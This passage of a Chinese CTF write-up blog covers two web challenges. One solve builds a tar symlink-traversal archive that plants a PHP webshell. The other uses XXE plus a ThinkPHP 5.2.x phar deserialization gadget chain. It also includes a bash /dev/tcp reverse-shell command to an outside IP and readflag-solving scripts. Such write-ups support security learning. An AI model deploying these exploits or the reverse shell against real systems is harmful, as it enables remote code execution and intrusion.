<h6 id="搜索发现https-bugs-debian-org-cgi-bin-bugreport-cgi-bug-900834。这是一个perl的目录穿梭漏洞。"><a href="#搜索发现https-bugs-debian-org-cgi-bin-bugreport-cgi-bug-900834。这是一个perl的目录穿梭漏洞。" class="headerlink" title="搜索发现https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=900834。这是一个perl的目录穿梭漏洞。"></a>搜索发现<a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=900834" target="_blank" rel="noopener">https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=900834</a>。这是一个perl的目录穿梭漏洞。</h6><h6 id="这个是比较详细的介绍http-knqyf263-hatenablog-com-entry-2018-06-27-181037"><a href="#这个是比较详细的介绍http-knqyf263-hatenablog-com-entry-2018-06-27-181037" class="headerlink" title="这个是比较详细的介绍http://knqyf263.hatenablog.com/entry/2018/06/27/181037"></a>这个是比较详细的介绍<a href="http://knqyf263.hatenablog.com/entry/2018/06/27/181037" target="_blank" rel="noopener">http://knqyf263.hatenablog.com/entry/2018/06/27/181037</a></h6><h6 id="上面会把文件解压到当前的文件夹中。"><a href="#上面会把文件解压到当前的文件夹中。" class="headerlink" title="上面会把文件解压到当前的文件夹中。"></a>上面会把文件解压到当前的文件夹中。</h6><h6 id="如下实验："><a href="#如下实验：" class="headerlink" title="如下实验："></a>如下实验：</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# ln -s /tmp/moo moo</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# ls</span><br><span class="line">demo.pl  ls|  moo</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# cat &lt;&lt;EOF&gt; foo</span><br><span class="line">&gt; #!/bin/sh</span><br><span class="line">&gt; echo foo</span><br><span class="line">&gt; EOF</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# ls</span><br><span class="line">demo.pl  foo  ls|  moo</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# tar zcvf b.tar.gz * --transform=&apos;s/foo/moo/g&apos;</span><br><span class="line">demo.pl</span><br><span class="line">foo</span><br><span class="line">ls|</span><br><span class="line">moo</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# tar -tvvf b.tar.gz</span><br><span class="line">-rw-r--r-- root/root        28 2019-11-11 18:18 demo.pl</span><br><span class="line">-rw-r--r-- root/root        19 2019-11-12 11:36 moo</span><br><span class="line">-rw-r--r-- root/root         0 2019-11-11 18:28 ls|</span><br><span class="line">lrwxrwxrwx root/root         0 2019-11-12 11:36 moo -&gt; /tmp/moo</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# ls /tmp/moo</span><br><span class="line">ls: cannot access &apos;/tmp/moo&apos;: No such file or directory</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# $ perl -MArchive::Tar -e &apos;Archive::Tar-&gt;extract_archive(&quot;traversal.tar.gz&quot;)&apos;</span><br><span class="line">$: command not found</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# $ perl -MArchive::Tar -e &apos;Archive::Tar-&gt;extract_archive(&quot;b.tar.gz&quot;)&apos;</span><br><span class="line">$: command not found</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# ls</span><br><span class="line">b.tar.gz  demo.pl  foo  ls|  moo</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# perl -MArchive::Tar -e &apos;Archive::Tar-&gt;extract_archive(&quot;b.tar.gz&quot;)&apos;</span><br><span class="line">Making symbolic link &apos;/root/perl_file/moo&apos; to &apos;/tmp/moo&apos; failed at -e line 1.</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# cat /tmp/moo</span><br><span class="line">#!/bin/sh</span><br><span class="line">echo foo</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# ls</span><br><span class="line">b.tar.gz  demo.pl  foo  ls|  moo</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# rm -rf /tmp/moo</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file# cat /tmp/moo</span><br><span class="line">cat: /tmp/moo: No such file or directory</span><br><span class="line">root@iZ2zeddon3u9gfk9gnpzscZ:~/perl_file#</span><br></pre></td></tr></table></figure>

<h6 id="因此可以这样构造："><a href="#因此可以这样构造：" class="headerlink" title="因此可以这样构造："></a>因此可以这样构造：</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ln -s /var/www/html/sandbox/wen.php wen</span><br><span class="line">tar -cf b.tar wen</span><br><span class="line">rm wen</span><br><span class="line">echo &apos;&lt;?php echo system(&quot;/readflag&quot;);&apos;&gt;wen</span><br><span class="line">tar -rf b.tar wen</span><br></pre></td></tr></table></figure>

<h6 id="同时我们还可以使用这个来归档为同名文件"><a href="#同时我们还可以使用这个来归档为同名文件" class="headerlink" title="同时我们还可以使用这个来归档为同名文件"></a>同时我们还可以使用这个来归档为同名文件</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tar zcvf b.tar.gz * --transform=&apos;s/&#123;你的文件名&#125;&#123;软连接&#125;&apos;</span><br></pre></td></tr></table></figure>

<h6 id="然后通过访问包含我们的b-tar"><a href="#然后通过访问包含我们的b-tar" class="headerlink" title="然后通过访问包含我们的b.tar"></a>然后通过访问包含我们的b.tar</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://183.129.189.62:17507/?url=http://123.57.232.69:8302/php_file/b.tar&amp;filename=b.tar</span><br></pre></td></tr></table></figure>

<h6 id="然后在沙盒中可以看到b-tar文件。"><a href="#然后在沙盒中可以看到b-tar文件。" class="headerlink" title="然后在沙盒中可以看到b.tar文件。"></a>然后在沙盒中可以看到b.tar文件。</h6><h6 id="然后再通过包含sandbox的文件来rce。"><a href="#然后再通过包含sandbox的文件来rce。" class="headerlink" title="然后再通过包含sandbox的文件来rce。"></a>然后再通过包含sandbox的文件来rce。</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://183.129.189.62:17507/?url=http://183.129.189.62:17507/sandbox/2aeae26864f775d4cad75f15a6c95d97/b.tar&amp;filename=b.tar</span><br></pre></td></tr></table></figure>

<h6 id="最后我们访问"><a href="#最后我们访问" class="headerlink" title="最后我们访问"></a>最后我们访问</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://183.129.189.62:17507/sandbox/wen.php</span><br></pre></td></tr></table></figure>

<h6 id="拿到flag如下："><a href="#拿到flag如下：" class="headerlink" title="拿到flag如下："></a>拿到flag如下：</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag&#123;3c3bf67443640154c155ce9b2eb5ce7a&#125;</span><br></pre></td></tr></table></figure>

<h5 id="0x02-Ticket-system-12end师傅"><a href="#0x02-Ticket-system-12end师傅" class="headerlink" title="0x02 Ticket_system[12end师傅]"></a>0x02 Ticket_system[12end师傅]</h5><h6 id="题目描述："><a href="#题目描述：" class="headerlink" title="题目描述："></a>题目描述：</h6><h6 id="1-首先题目有个文件上传的点，然后有个可以提交xml的地方。那么我们就可以通过这两个点了展开我们的攻击。"><a href="#1-首先题目有个文件上传的点，然后有个可以提交xml的地方。那么我们就可以通过这两个点了展开我们的攻击。" class="headerlink" title="1. 首先题目有个文件上传的点，然后有个可以提交xml的地方。那么我们就可以通过这两个点了展开我们的攻击。"></a>1. 首先题目有个文件上传的点，然后有个可以提交xml的地方。那么我们就可以通过这两个点了展开我们的攻击。</h6><h6 id="2-现在我们先尝试一下xxe："><a href="#2-现在我们先尝试一下xxe：" class="headerlink" title="2. 现在我们先尝试一下xxe："></a>2. 现在我们先尝试一下xxe：</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/redhat_web2_1.png" alt></p>
<h6 id="可以看到成功的读取了本地文件。"><a href="#可以看到成功的读取了本地文件。" class="headerlink" title="可以看到成功的读取了本地文件。"></a>可以看到成功的读取了本地文件。</h6><h6 id="我们通过读取源码发现是thinkPhp的空架版本是5-2-0，通过搜索找到了Smile的一个5-2-x的版本的反序列化链，下面是payload"><a href="#我们通过读取源码发现是thinkPhp的空架版本是5-2-0，通过搜索找到了Smile的一个5-2-x的版本的反序列化链，下面是payload" class="headerlink" title="我们通过读取源码发现是thinkPhp的空架版本是5.2.0，通过搜索找到了Smile的一个5.2.x的版本的反序列化链，下面是payload:"></a>我们通过读取源码发现是thinkPhp的空架版本是<code>5.2.0</code>，通过搜索找到了<code>Smile</code>的一个<code>5.2.x</code>的版本的反序列化链，下面是payload:</h6><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">think</span>\<span class="title">process</span>\<span class="title">pipes</span> &#123;</span><br><span class="line">    <span class="title">class</span> <span class="title">Windows</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title">private</span> $<span class="title">files</span>;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($files)</span></span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;files = <span class="keyword">array</span>($files);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">think</span>\<span class="title">model</span>\<span class="title">concern</span> &#123;</span><br><span class="line">    <span class="title">trait</span> <span class="title">Conversion</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title">protected</span> $<span class="title">append</span> = <span class="title">array</span>("<span class="title">Smi1e</span>" =&gt; "1");</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">trait</span> Attribute</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">private</span> $data;</span><br><span class="line">        <span class="keyword">private</span> $withAttr = <span class="keyword">array</span>(<span class="string">"Smi1e"</span> =&gt; <span class="string">"system"</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">get</span><span class="params">($system)</span></span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;data = <span class="keyword">array</span>(<span class="string">"Smi1e"</span> =&gt; <span class="string">"$system"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title">think</span> &#123;</span><br><span class="line">    <span class="title">abstract</span> <span class="title">class</span> <span class="title">Model</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title">use</span> <span class="title">model</span>\<span class="title">concern</span>\<span class="title">Attribute</span>;</span><br><span class="line">        <span class="keyword">use</span> <span class="title">model</span>\<span class="title">concern</span>\<span class="title">Conversion</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">think</span>\<span class="title">model</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">think</span>\<span class="title">Model</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Pivot</span> <span class="keyword">extends</span> <span class="title">Model</span></span></span><br><span class="line"><span class="class">    </span>&#123;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">($system)</span></span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;get($system);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> &#123;</span><br><span class="line">    $<span class="title">Conver</span> = <span class="title">new</span> <span class="title">think</span>\<span class="title">model</span>\<span class="title">Pivot</span>("<span class="title">sleep</span> 100");</span><br><span class="line">    $payload = <span class="keyword">new</span> think\process\pipes\Windows($Conver);</span><br><span class="line">    @unlink(<span class="string">"phar.phar"</span>);</span><br><span class="line">    $phar = <span class="keyword">new</span> Phar(<span class="string">"phar.phar"</span>); <span class="comment">//后缀名必须为phar</span></span><br><span class="line">    $phar-&gt;startBuffering();</span><br><span class="line">    $phar-&gt;setStub(<span class="string">"GIF89a&lt;?php __HALT_COMPILER(); ?&gt;"</span>); <span class="comment">//设置stub</span></span><br><span class="line">    $phar-&gt;setMetadata($payload); <span class="comment">//将自定义的meta-data存入manifest</span></span><br><span class="line">    $phar-&gt;addFromString(<span class="string">"test.txt"</span>, <span class="string">"test"</span>); <span class="comment">//添加要压缩的文件</span></span><br><span class="line">    <span class="comment">//签名自动计算</span></span><br><span class="line">    $phar-&gt;stopBuffering();</span><br><span class="line">    <span class="keyword">echo</span> urlencode(serialize($payload));</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h6 id="我们配合phar-反序列化进行rce。"><a href="#我们配合phar-反序列化进行rce。" class="headerlink" title="我们配合phar://反序列化进行rce。"></a>我们配合<code>phar://</code>反序列化进行rce。</h6><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">POST /postXML HTTP/1.1</span><br><span class="line">Host: 47.105.78.102</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0</span><br><span class="line">Accept: application/xml, text/xml, */*; q=0.01</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Content-Type: application/xml;charset=utf-8</span><br><span class="line">X-Requested-With: XMLHttpRequest</span><br><span class="line">Content-Length: 227</span><br><span class="line">Connection: close</span><br><span class="line">Referer: http://47.105.78.102/ticket</span><br><span class="line">Cookie: PHPSESSID=lhps1inapcge7mumnt07jrqn82</span><br><span class="line"></span><br><span class="line">&lt;?xml version=&quot;1.0&quot;?&gt;</span><br><span class="line">&lt;!DOCTYPE GVI [&lt;!ENTITY xxe SYSTEM &quot;phar:///tmp/uploads/21232f297a57a5a743894a0e4a801fc3/20191110/acfeb10ed83aad76c0c2249ce7e93996.xml&quot; &gt;]&gt;</span><br><span class="line">&lt;ticket&gt;&lt;username&gt;&amp;xxe;&lt;/username&gt;&lt;code&gt;1111111&lt;/code&gt;&lt;/ticket&gt;</span><br></pre></td></tr></table></figure>

<h6 id="将sleep-100改成bash-c-39-bash-i-gt-dev-tcp-1-1-1-1-4444-0-gt-amp-1-39-，然后在自己的服务器监听一下。就可以反弹shell了。"><a href="#将sleep-100改成bash-c-39-bash-i-gt-dev-tcp-1-1-1-1-4444-0-gt-amp-1-39-，然后在自己的服务器监听一下。就可以反弹shell了。" class="headerlink" title="将sleep 100改成bash -c &#39;bash -i &gt;/dev/tcp/1.1.1.1/4444 0&gt;&amp;1&#39;，然后在自己的服务器监听一下。就可以反弹shell了。"></a>将<code>sleep 100</code>改成<code>bash -c &#39;bash -i &gt;/dev/tcp/1.1.1.1/4444 0&gt;&amp;1&#39;</code>，然后在自己的服务器监听一下。就可以反弹shell了。</h6><h6 id="getshell后发现并不能读取flag文件由于对www-data有权限的设置，但是在根目录下有一个readflag的二进制文件，但是执行它会出现一个随机计算的式子，由于nc这样的shell不能交互，但是上面有php和perl的环境那么我们可以上传文件去执行建立交互。从从而获得flag。"><a href="#getshell后发现并不能读取flag文件由于对www-data有权限的设置，但是在根目录下有一个readflag的二进制文件，但是执行它会出现一个随机计算的式子，由于nc这样的shell不能交互，但是上面有php和perl的环境那么我们可以上传文件去执行建立交互。从从而获得flag。" class="headerlink" title="getshell后发现并不能读取flag文件由于对www-data有权限的设置，但是在根目录下有一个readflag的二进制文件，但是执行它会出现一个随机计算的式子，由于nc这样的shell不能交互，但是上面有php和perl的环境那么我们可以上传文件去执行建立交互。从从而获得flag。"></a>getshell后发现并不能读取flag文件由于对www-data有权限的设置，但是在根目录下有一个readflag的二进制文件，但是执行它会出现一个随机计算的式子，由于nc这样的shell不能交互，但是上面有php和perl的环境那么我们可以上传文件去执行建立交互。从从而获得flag。</h6><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$descriptorspec = <span class="keyword">array</span>(</span><br><span class="line">   <span class="number">0</span> =&gt; <span class="keyword">array</span>(<span class="string">"pipe"</span>, <span class="string">"r"</span>),  <span class="comment">// 标准输入，子进程从此管道中读取数据</span></span><br><span class="line">   <span class="number">1</span> =&gt; <span class="keyword">array</span>(<span class="string">"pipe"</span>, <span class="string">"w"</span>),  <span class="comment">// 标准输出，子进程向此管道中写入数据</span></span><br><span class="line">   <span class="number">2</span> =&gt; <span class="keyword">array</span>(<span class="string">"file"</span>, <span class="string">"/tmp/error-output.txt"</span>, <span class="string">"a"</span>) <span class="comment">// 标准错误，写入到一个文件</span></span><br><span class="line">);</span><br><span class="line"> </span><br><span class="line">$cwd = <span class="string">'/tmp'</span>;</span><br><span class="line">$env = <span class="keyword">array</span>(<span class="string">'some_option'</span> =&gt; <span class="string">'aeiou'</span>);</span><br><span class="line"> </span><br><span class="line">$process = proc_open(<span class="string">'/readflag'</span>, $descriptorspec, $pipes, $cwd, $env);</span><br><span class="line"> </span><br><span class="line"><span class="keyword">if</span> (is_resource($process)) &#123;</span><br><span class="line">    <span class="comment">// $pipes 现在看起来是这样的：</span></span><br><span class="line">    <span class="comment">// 0 =&gt; 可以向子进程标准输入写入的句柄</span></span><br><span class="line">    <span class="comment">// 1 =&gt; 可以从子进程标准输出读取的句柄</span></span><br><span class="line">    <span class="comment">// 错误输出将被追加到文件 /tmp/error-output.txt</span></span><br><span class="line"> </span><br><span class="line">    <span class="comment">//fwrite($pipes[0], '');</span></span><br><span class="line">    <span class="comment">//fclose($pipes[0]);</span></span><br><span class="line"> </span><br><span class="line">        $output1 = fread($pipes[<span class="number">1</span>],<span class="number">1024</span>);</span><br><span class="line">        var_dump($output);</span><br><span class="line">        $output2 = fread($pipes[<span class="number">1</span>],<span class="number">1024</span>);</span><br><span class="line">        var_dump($output);</span><br><span class="line">        $output3 = fread($pipes[<span class="number">1</span>],<span class="number">1024</span>);</span><br><span class="line">        var_dump($output);</span><br><span class="line">    </span><br><span class="line">    $calc = trim($output2);</span><br><span class="line">    $an = <span class="keyword">eval</span>(<span class="string">"return $calc;"</span>);</span><br><span class="line">    var_dump($an);</span><br><span class="line">    fwrite($pipes[<span class="number">0</span>], (string)$an.<span class="string">"\n"</span>);</span><br><span class="line"> </span><br><span class="line">    $output = stream_get_contents($pipes[<span class="number">1</span>]);</span><br><span class="line">    var_dump($output);</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">    <span class="comment">// 切记：在调用 proc_close 之前关闭所有的管道以避免死锁。</span></span><br><span class="line">    $return_value = proc_close($process);</span><br><span class="line"> </span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"command returned $return_value\n"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h6 id="自己写的："><a href="#自己写的：" class="headerlink" title="自己写的："></a>自己写的：</h6><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$descriptorspec = <span class="keyword">array</span>(</span><br><span class="line">    <span class="number">0</span> =&gt; <span class="keyword">array</span>(<span class="string">"pipe"</span>, <span class="string">"r"</span>),  <span class="comment">// 标准输入，子进程从此管道中读取数据</span></span><br><span class="line">    <span class="number">1</span> =&gt; <span class="keyword">array</span>(<span class="string">"pipe"</span>, <span class="string">"w"</span>),  <span class="comment">// 标准输出，子进程向此管道中写入数据</span></span><br><span class="line">    <span class="number">2</span> =&gt; <span class="keyword">array</span>(<span class="string">"file"</span>, <span class="string">"/tmp/error-output.txt"</span>, <span class="string">"a"</span>) <span class="comment">// 标准错误，写入到一个文件</span></span><br><span class="line">);</span><br><span class="line"></span><br><span class="line">$process = proc_open(<span class="string">'/readflag'</span>, $descriptorspec, $pipes, $cwd, $env);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (is_resource($process)) &#123;</span><br><span class="line">    $question = fread($pipes[<span class="number">1</span>],<span class="number">1024</span>); <span class="comment">// 获取程序问题</span></span><br><span class="line">    $question = fread($pipes[<span class="number">1</span>],<span class="number">1024</span>); <span class="comment">// 获取程序问题</span></span><br><span class="line">    $question = trim($question);</span><br><span class="line">    var_dump($question);</span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">'$result = '</span>.$question.<span class="string">';'</span>);   <span class="comment">// 计算问题结果</span></span><br><span class="line">    fwrite($pipes[<span class="number">0</span>], $result);         <span class="comment">// 回答程序问题</span></span><br><span class="line">    fclose($pipes[<span class="number">0</span>]);</span><br><span class="line">    var_dump($result);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// $flag = stream_get_contents($pipes[1]);// getflag</span></span><br><span class="line">    $flag = fread($pipes[<span class="number">1</span>],<span class="number">1024</span>);</span><br><span class="line">    $flag = fread($pipes[<span class="number">1</span>],<span class="number">1024</span>);</span><br><span class="line">    $flag = fread($pipes[<span class="number">1</span>],<span class="number">1024</span>);</span><br><span class="line"></span><br><span class="line">    fclose($pipes[<span class="number">1</span>]);</span><br><span class="line">    var_dump($flag);</span><br><span class="line"></span><br><span class="line">    $return_value = proc_close($process);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"command returned $return_value\n"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h6 id="运行的结果："><a href="#运行的结果：" class="headerlink" title="运行的结果："></a>运行的结果：</h6><p><img src="https://raw.githubusercontent.com/ljdd520/images/master/img/redhat_web2_2.PNG" alt></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/06/sql注入的知识总结/" rel="next" title="sql注入的知识总结">
                <i class="fa fa-chevron-left"></i> sql注入的知识总结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/13/总结一下反弹shell/" rel="prev" title="总结一下反弹shell">
                总结一下反弹shell <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.jpg" alt="Ljdd520">
            
              <p class="site-author-name" itemprop="name">Ljdd520</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">48</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/yourname" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:yourname@gmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.wonderkun.cc/" title="wonderkun" target="_blank">wonderkun</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://example.com/" title="Title" target="_blank">Title</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
